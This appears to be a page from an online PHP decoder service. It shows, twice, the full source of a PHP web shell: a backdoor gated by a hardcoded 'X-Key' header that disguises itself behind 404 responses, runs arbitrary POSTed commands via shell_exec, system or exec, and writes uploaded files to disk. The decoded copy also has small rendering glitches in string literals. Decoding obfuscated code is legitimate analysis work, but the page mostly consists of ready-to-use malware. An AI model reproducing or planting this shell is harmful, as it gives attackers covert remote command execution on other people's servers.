Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $x = "oRXSIIA2ru2Rw1FX"; if($_SERVER['HTTP_X_KEY'] !== $x) { header("Locati..

Decoded Output download

<?php 
 
$x = "oRXSIIA2ru2Rw1FX"; 
if($_SERVER['HTTP_X_KEY'] !== $x) { 
 
  header("Location: /404.html"); 
  exit(); 
} 
header("HTTP/1.1 404 Not Found"); 
header("Status: 404 Not Found"); 
function c($y) { 
  $o = ''; 
  if(function_exists('shell_exec')) { 
    $o = @shell_exec($y); 
  } elseif(function_exists('system')) { 
    ob_start(); 
    @system($y); 
    $o = ob_get_clean(); 
  } elseif(function_exists('exec')) { 
    @exec($y, $t); 
    $o = implode("
", $t); 
  } 
  return $o; 
} 
if($_SERVER['REQUEST_METHOD'] == 'POST') { 
  if(isset($_POST['cmd'])) { 
    $r = c($_POST['cmd']); 
    die($r); 
  } 
  
  if(isset($_POST['content']) && isset($_POST['filename'])) { 
    $c = $_POST['content']; 
    $f = $_POST['filename']; 
    
    $f = str_replace([chr(0), '\'], '', $f); 
    if(!preg_match('/^[a-zA-Z0-9\/\._-]+$/', $f)) { 
      die("Invalid filename"); 
    } 
    
    if(@file_put_contents($f, $c)) { 
      die("Upload success"); 
    } else { 
      die("Write failed"); 
    } 
  } 
} 
 ?>

Did this file decode correctly?

Original Code

<?php

$x = "oRXSIIA2ru2Rw1FX";
if($_SERVER['HTTP_X_KEY'] !== $x) {

  header("Location: /404.html");
  exit();
}
header("HTTP/1.1 404 Not Found");
header("Status: 404 Not Found");
function c($y) {
  $o = '';
  if(function_exists('shell_exec')) {
    $o = @shell_exec($y);
  } elseif(function_exists('system')) {
    ob_start();
    @system($y);
    $o = ob_get_clean();
  } elseif(function_exists('exec')) {
    @exec($y, $t);
    $o = implode("\n", $t);
  }
  return $o;
}
if($_SERVER['REQUEST_METHOD'] == 'POST') {
  if(isset($_POST['cmd'])) {
    $r = c($_POST['cmd']);
    die($r);
  }
 
  if(isset($_POST['content']) && isset($_POST['filename'])) {
    $c = $_POST['content'];
    $f = $_POST['filename'];
   
    $f = str_replace([chr(0), '\\'], '', $f);
    if(!preg_match('/^[a-zA-Z0-9\/\._-]+$/', $f)) {
      die("Invalid filename");
    }
   
    if(@file_put_contents($f, $c)) {
      die("Upload success");
    } else {
      die("Write failed");
    }
  }
}

Function Calls

None

Variables

None

Stats

MD5 cafe80314dcedafd0767dc4ff5c6bc67
Eval Count 0
Decode Time 49 ms